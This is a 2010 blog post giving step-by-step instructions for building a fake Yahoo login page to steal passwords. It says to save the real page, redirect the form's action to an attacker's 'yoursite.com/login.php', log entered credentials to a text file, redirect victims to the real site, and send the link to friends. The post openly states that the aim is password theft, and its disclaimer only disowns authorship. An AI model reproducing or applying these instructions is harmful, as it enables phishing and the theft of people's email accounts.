Friday, February 26, 2010

How to Create a Fake Login Page?

How to Create a Fake Login Page?

In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.

Here is a step-by-step procedure to create a fake login page.

1. Go to the Yahoo login page by typing the following URL.

mail.yahoo.com

2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)

3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

4. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files.You may also rename the .HTML file to yahoo.HTML

5. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif
Rename the above link into
src=”files/ma_mail_1.gif
Repeat the same procedure for every file contained in the Folder.
6. Now search for the following term
action=
you will see something like this
action=https://login.yahoo.com/config/login?
Edit this to
action=http://yoursite.com/login.php
Save the changes to the file.
NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

yoursite.com/

7. Now you have to upload your yahoo.HTML, files folder and login.php to your web server

NOTE: Make sure that your host(web server) supports PHP

8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site.Download .TXT file to see the password inside

The details of hacking an email, using a Fake login page is discussed in detail in my new post Hack Yahoo, Gmail or any other Password

No comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...

Disclaimer

All the postings of mine in this whole BLOG is not my own collection. All are downloaded from internet posted by some one else. I am just saving some time of our blog users to avoid searching everywhere. Am not violating any copy rights law or not any illegal action am not supposed to do.If anything is against law please notify so that they can be removed